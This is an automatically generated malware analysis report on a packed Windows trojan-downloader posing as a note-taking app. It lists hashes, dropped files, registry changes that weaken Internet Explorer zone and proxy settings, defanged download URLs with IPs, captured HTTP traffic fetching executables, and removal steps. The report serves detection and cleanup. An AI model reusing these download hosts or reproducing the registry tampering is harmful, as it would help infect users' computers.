HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 93b111c1a0a31e76b5729574bbdece6d
SHA1: 8c16e05b80405092310ee78d4e0d9dbdf39f3dbf
SHA256: 4da272d4d9de237b32daf9a6a234c69c1874d027e346d699a31192798d500eac
SSDeep: 12288:8XjMVYN6X4sWlRig2J7ClvZxVLvUoyUoKQt5ynmePVvO/xwV15:8Xu06XJMz GlL99yU 3ccM
Size: 723968 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2015-06-29 23:29:30
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
setup_30004.exe:2012
syunbo_53_1248.exe:1300
The Trojan injects its code into the following process(es):
%original file name%.exe:400
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process setup_30004.exe:2012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\anote\Alarm.wav (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\nsisdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskE.tmp (35241 bytes)
%Program Files%\anote\uninstall.exe (2392 bytes)
%Program Files%\anote\anote.dat (286 bytes)
%Program Files%\anote\Language\chinese.ini (2 bytes)
%Documents and Settings%\%current user%\Desktop\¶à²Ê±ãÇ©.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\öÃâ€ÂØ.lnk (1 bytes)
%Program Files%\anote\cfg.ini (124 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\¶à²Ê±ãÇ©.lnk (1 bytes)
%Program Files%\anote\anote.exe (36078 bytes)
%Program Files%\anote\about.jpg (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\System.dll (11 bytes)
%Program Files%\anote\anote.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\anote.png (243 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\°ïÖú.lnk (286 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsuD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\nsisdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\anote.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp (0 bytes)
The process %original file name%.exe:400 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\syunbo_53_1248.exe (6396 bytes)
The process syunbo_53_1248.exe:1300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\dBwBAAAAAAAA (207286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\psb[1].gif (383250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_30004[1].exe (81171 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Program Files%\setup_30004.exe (34350 bytes)
Registry activity
The process setup_30004.exe:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\anote]
"anote" = "noteupdateservice"
"fixid" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"NoModify" = "1"
[HKCR\Applications\anote.exe]
"NoStartPage" = ""
[HKLM\SOFTWARE\anote]
"Names" = "noteupdateservice"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"InstallDate" = "20140812"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\anote\data]
"runtime" = "65000"
"LastVersion" = "1.35"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\anote]
"Version" = "1.35"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCR\CLSID\{F481F745-5C57-4f71-95B4-78546706C7A9}]
"QI" = "000C29AC63984C23B2F35C8C20B50EF2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"UninstallString" = "%Program Files%\anote\uninstall.exe _?=%Program Files%\anote"
[HKLM\SOFTWARE\anote]
"IconIndex" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"DisplayIcon" = "%Program Files%\anote\uninstall.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"DisplayName" = "anote (v1.35)"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 BB FA A7 8B 50 D5 ED 3E B0 BE F5 5C 21 DD A9"
[HKLM\SOFTWARE\anote]
"Count" = "1"
"instname" = "setup_30004.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\anote\data]
"rdata" = "bgQOVG8eWhYLCGQZGUQRVx5RC1YLB3F4S31vaQsYaBIuHX9AbWdrTxFpHW8IHQg5dHw8f2JpBVsnUQROVCthEHZPEx8XAgMZWUpxCBkKOhpeG29BXRpZQWMREEsWH01PXk9YHnZdVUg6RFtKMVw1X00Xe1VECk5EQ15eBX4DMFUVST5Y"
[HKLM\SOFTWARE\anote]
"(Default)" = "%Program Files%\anote"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"NoRepair" = "1"
[HKLM\SOFTWARE\anote]
"Options" = "1"
[HKCR\Applications\Uninstall.exe]
"NoStartPage" = ""
[HKLM\SOFTWARE\anote]
"InstallTime" = "2015812"
The process %original file name%.exe:400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 24 3F 05 4E D1 D5 F0 64 98 36 23 7E 5C 56 F8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings to map all local web nodes whose names contain no dots and which do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process syunbo_53_1248.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%]
"setup_30004.exe" = "Muti Color Note"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 7C 66 57 A6 02 CE 62 54 4D FE B9 4B D0 2A 48"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings to map all local web nodes whose names contain no dots and which do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
272edafd76205919cd3f5218cd14d247 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_30004[1].exe |
bfbe9995a89f75b55fdc9b756a41cbb7 | c:\Program Files\anote\anote.dll |
44fc98f03e2270629e9f9b19d6200588 | c:\Program Files\anote\anote.exe |
8eb8239f10f026307a10c9c3a71c5106 | c:\Program Files\anote\uninstall.exe |
272edafd76205919cd3f5218cd14d247 | c:\Program Files\setup_30004.exe |
1a1f4c4066d1d49db10b2b273b4efd9c | c:\syunbo_53_1248.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
setup_30004.exe:2012
syunbo_53_1248.exe:1300
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\anote\Alarm.wav (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\nsisdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskE.tmp (35241 bytes)
%Program Files%\anote\uninstall.exe (2392 bytes)
%Program Files%\anote\anote.dat (286 bytes)
%Program Files%\anote\Language\chinese.ini (2 bytes)
%Documents and Settings%\%current user%\Desktop\¶à²Ê±ãÇ©.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\öÃâ€ÂØ.lnk (1 bytes)
%Program Files%\anote\cfg.ini (124 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\¶à²Ê±ãÇ©.lnk (1 bytes)
%Program Files%\anote\anote.exe (36078 bytes)
%Program Files%\anote\about.jpg (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\System.dll (11 bytes)
%Program Files%\anote\anote.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\anote.png (243 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\°ïÖú.lnk (286 bytes)
C:\syunbo_53_1248.exe (6396 bytes)
%Program Files%\dBwBAAAAAAAA (207286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\psb[1].gif (383250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_30004[1].exe (81171 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Program Files%\setup_30004.exe (34350 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 671744 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 675840 | 524288 | 521728 | 5.37025 | f2a991e53cdcbbcb9355c64f56504a1f |
.rsrc | 1200128 | 204800 | 201216 | 4.47958 | 00414c43d8e228c2c17539fdd4adb18f |
Network Activity
URLs
URL | IP |
---|---|
hxxp://d.juezhao123.com/setup/setup_30004.exe | 58.222.24.189 |
hxxp://www.jiuhuabuy.com/kuplay/930/871248/ | 121.43.68.2 |
hxxp://120.55.137.126/1439353161-930-871248/ | |
hxxp://rawtj.photo.store.qq.com/psb?/V11ocPuK4Lde3Q/o1lxhiN1xUeN16I9G2IBO1NuWCYmmN8D3gGbpJxI0bE!/r/dBwBAAAAAAAA | 123.151.71.111 |
hxxp://image.juezhao123.com/img/30004.jpg?t=1930351 | 58.222.20.238 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /img/30004.jpg?t=1930351 HTTP/1.0
Host: image.juezhao123.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Wed, 12 Aug 2015 04:15:56 GMT
Content-Type: image/jpeg
Content-Length: 243
Last-Modified: Sat, 08 Aug 2015 04:10:03 GMT
Connection: close
Accept-Ranges: bytes
[Settings]..iconindex=1..pos=..width=550..height=400..border=10..tooltip=0..titleheight=50..trayiconindex=0..showstatus=0..transparent=10%..newwidth=0..newheight=0..anote=100..noteupdateservice=1..menucolor=2..sand=65000..float=1..order=desc....
GET /psb?/V11ocPuK4Lde3Q/o1lxhiN1xUeN16I9G2IBO1NuWCYmmN8D3gGbpJxI0bE!/r/dBwBAAAAAAAA HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: rawtj.photo.store.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: max-age=94608000
Content-Length: 12293787
Content-Type: image/gif
Expires: Mon, 5 Dec 2050 07:25:14 GMT
Last-Modified: Mon, 18 Dec 2006 07:25:14 GMT
Server: httpserver
<<< skipped >>>
GET /kuplay/930/871248/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.jiuhuabuy.com
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Date: Wed, 12 Aug 2015 04:19:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
location: hXXp://120.55.137.126/1439353161-930-871248/
GET /1439353161-930-871248/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 120.55.137.126
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 12 Aug 2015 04:19:26 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Content-Disposition: attachment; filename=bobolicjlhgabdh.exe
Set-Cookie: route=;Path=/
<<< skipped >>>
GET /setup/setup_30004.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.juezhao123.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 12 Aug 2015 12:08:14 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sat, 08 Aug 2015 12:04:05 GMT
ETag: "409d8-9da10-51ccb8c913a21"
Accept-Ranges: bytes
Content-Length: 645648
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
<<< skipped >>>
Strings from Dumps
%original file name%.exe_400:
%original file name%.exe_400_rwx_00401000_00123000:
syunbo_53_1248.exe_1300: